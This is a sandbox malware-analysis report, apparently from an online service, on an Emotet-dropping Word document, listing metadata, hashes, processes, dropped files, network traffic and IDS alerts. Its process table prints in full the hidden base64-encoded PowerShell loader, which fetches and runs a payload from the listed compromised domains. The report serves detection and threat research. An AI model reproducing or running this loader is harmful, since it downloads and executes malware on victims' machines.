File name: | 7976637-20191115.doc |
Full analysis: | https://app.any.run/tasks/0ebedf4b-b5fc-4563-ac36-f2de98986827 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 16, 2019, 05:32:38 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Reiciendis distinctio voluptas., Author: Leona Hirt, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 14 23:18:00 2019, Last Saved Time/Date: Thu Nov 14 23:18:00 2019, Number of Pages: 1, Number of Words: 15, Number of Characters: 88, Security: 0 |
MD5: | 848CB04DED3BFB39063BC4A1DCDA90D7 |
SHA1: | 3F7235C076CBAAAC89C9BADEA7166CE848C2A46D |
SHA256: | A32B15F20864FD7920F686858454947F3A65748A425AAC915334A6753B55C6E1 |
SSDEEP: | 3072:WeZoH+UaqFh5Er/SzFaSadGBrjC48+WZ/POhh+/dFsaEM0lyT6+Y:WeZoHNaqmSzGdD48+aPOn0mPlyT6l |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Reiciendis distinctio voluptas. |
---|---|
Subject: | - |
Author: | Leona Hirt |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:11:14 23:18:00 |
ModifyDate: | 2019:11:14 23:18:00 |
Pages: | 1 |
Words: | 15 |
Characters: | 88 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 102 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 25 |
CompObjUserType: | Microsoft Forms 2.0 Form |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2172 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\7976637-20191115.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
408 | powershell -w hidden -enco JABDAGsAcABjAHEAYwBiAGgAcgA9ACcARwB0AHcAYwBiAHEAYwBwACcAOwAkAFkAYQB6AGoAZQB0AGYAaQB0AHEAIAA9ACAAJwA5ADMAMAAnADsAJABBAHoAaABlAGMAbgB1AGYAdwBoAD0AJwBNAG0AYgBxAG4AcABuAGcAJwA7ACQAUAB5AGYAagBvAHgAcgBzAGUAcwBvAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABZAGEAegBqAGUAdABmAGkAdABxACsAJwAuAGUAeABlACcAOwAkAFcAcwBwAGgAcQBlAHIAcgA9ACcAWgB0AGoAcQB2AG0AegBuAG0AbABhAHcAdwAnADsAJABNAHAAdAB5AHMAegB5AGgAZAB1AD0ALgAoACcAbgAnACsAJwBlAHcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAGUAdAAuAFcARQBCAGMATABJAGUATgB0ADsAJABKAGUAagBpAGkAZgBsAGMAbQBkAGwAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBoAGkAbgBlAG4AaQBlAHMAdABlAHQAaQBjAGEALgBjAG8AbQAuAGIAcgAvAGUAZABoAGwAbgB6AC8AOABKAFUAZgBHADkAcQAvACoAaAB0AHQAcAA6AC8ALwBtAGUAcgB0AHQAYQBzAGEAcgBpAG0ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHEAdgB1AHEAegAvACoAaAB0AHQAcABzADoALwAvAGMAbwBwAGEAYQBsAGwAaQBhAG4AegBnAGkAbABsAGkAbgBnAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBsAC8AKgBoAHQAdABwAHMAOgAvAC8AYQBkAGgAZQBzAGkAdgBlAC4AYgBlAG4AZwBhAGwAZwByAG8AdQBwAC4AYwBvAG0ALwBiAGkAdgBnAGcALwA1AG8ANwBiAGcALwAqAGgAdAB0AHAAcwA6AC8ALwBjAGwAZQBhAHIAcwBvAGwAdQB0AGkAbwBuAG8AdwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFAAQgA0AFYAMABQAC8AJwAuACIAcwBQAEwAYABJAFQAIgAoACcAKgAnACkAOwAkAFAAegBhAG8AegBrAGIAcQB5AGQAPQAnAFYAdwBxAG8AZgBnAG4AZAB0AGMAbAAnADsAZgBvAHIAZQBhAGMAaAAoACQASgBnAGgAbQB3AHMAegB6AGcAbgBnAGgAIABpAG4AIAAkAEoAZQBqAGkAaQBmAGwAYwBtAGQAbAApAHsAdAByAHkAewAkAE0AcAB0AHkAcwB6AHkAaABkAHUALgAiAEQATwBgAHcATgBsAGAATwBBAGQAYABGAGkATABlACIAKAAkAEoAZwBoAG0AdwBzAHoAegBnAG4AZwBoACwAIAAkAFAAeQBmAGoAbwB4AHIAcwBlAHMAbwApADsAJABQAHoAdABnAGMAegB2AHkAPQAnAEYAcQBjAGIAbQB4AGMAbAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAJwArACcAbQAnACkAIAAkAFAAeQBmAGoAbwB4AHIAcwBlAHMAbwApAC4AIgBMAGUATgBHAGAAVABoACIAIAAtAGcAZQAgADMAMAAxADUANwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYABBAFIAVAAiACgAJABQAHkAZgBqAG8AeAByAHMAZQBzAG8AKQA7ACQARQBxAHcAeAB2AHEAaQBuAHIAbgBvAGcAbwA9ACcASABqAHYAZAB0AHEAeQB2AGsAeAAnADsAYgByAGUAYQBrADsAJABCAGcAcQByAHkAbwBkAGwAaQA9ACcASABpAG0AbABnAG4AcgBrAG8AcgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABUAHAAagBuAGcAZgB2AGwAegBzAGwAPQAnAEEAdgBwAHMAbAB5AGIAawB6ACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2172 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA9E6.tmp.cvr | — | |
MD5:— | SHA256:— | |||
408 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IUTZHR2A5WFUDCZ3RRO7.temp | — | |
MD5:— | SHA256:— | |||
2172 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D7BD040.wmf | wmf | |
MD5:F9D4E450BB15C4BB99404AA8D7E6F34C | SHA256:215626B3434333B577B0AF55114C24BA71CC4C02A2777A09849130B5A28BE1FB | |||
408 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b63b.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2172 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:54C1B91701028DA5D9D54BBF51316054 | SHA256:FCCB70D0A32271E658F9E74FA2F3A4D5408CD29A9C6343B41CCEDB748F838AB6 | |||
2172 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:C96E99733055DE1BE4CD838C3EDFDD35 | SHA256:76422589DC9453E44CF097914D549076F5D8B0849B32C8DF567DF59D8BCAF89E | |||
2172 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$76637-20191115.doc | pgc | |
MD5:F1F68F93BD6472292C1D024C5E7C9E7B | SHA256:26A8D248C9FBC6BD2D12E2566E24DB3FFE77410186C292D64F510310E5B3DF45 | |||
2172 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5A831341.wmf | wmf | |
MD5:024A5FD9150C2776320F93E64712326D | SHA256:2EF3D0F9BEF8105944B1D1C957F94B94BAA714961D9141E960954276F2C93CB2 | |||
2172 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A8FCE87B.wmf | wmf | |
MD5:06ADDC0EDE22D65767090FE9AA560476 | SHA256:4DA8A29741BD343B54FA62AD4DA4AAEF0DA7FC129F3118777F6D33B055670EDB | |||
2172 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7148D5E2.wmf | wmf | |
MD5:A672DD2671D2BEBF0DCA6A480E4886F3 | SHA256:20E4A1D722AA66096A71C89CA0B0A1114DF84DF273A99D39327319D6E566AE43 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
408 | powershell.exe | GET | 403 | 104.237.136.140:80 | http://www.hineniestetica.com.br/edhlnz/8JUfG9q/ | US | html | 146 b | unknown |
408 | powershell.exe | GET | 404 | 94.103.37.178:80 | http://merttasarim.com/wp-admin/qvuqz/ | TR | html | 315 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
408 | powershell.exe | 138.197.198.27:443 | copaallianzgilling.com | Digital Ocean, Inc. | US | unknown |
408 | powershell.exe | 94.103.37.178:80 | merttasarim.com | VeriTeknik Bilisim Ltd. | TR | suspicious |
408 | powershell.exe | 104.237.136.140:80 | www.hineniestetica.com.br | Linode, LLC | US | unknown |
408 | powershell.exe | 104.168.154.231:443 | clearsolutionow.com | Hostwinds LLC. | US | unknown |
408 | powershell.exe | 72.55.186.36:443 | adhesive.bengalgroup.com | iWeb Technologies Inc. | CA | unknown |
Domain | IP | Reputation |
---|---|---|
www.hineniestetica.com.br |
| unknown |
merttasarim.com |
| suspicious |
copaallianzgilling.com |
| unknown |
adhesive.bengalgroup.com |
| malicious |
clearsolutionow.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
408 | powershell.exe | Generic Protocol Command Decode | SURICATA TLS invalid record type |
408 | powershell.exe | Generic Protocol Command Decode | SURICATA TLS invalid record type |
408 | powershell.exe | Generic Protocol Command Decode | SURICATA TLS invalid record type |
408 | powershell.exe | Generic Protocol Command Decode | SURICATA TLS invalid record type |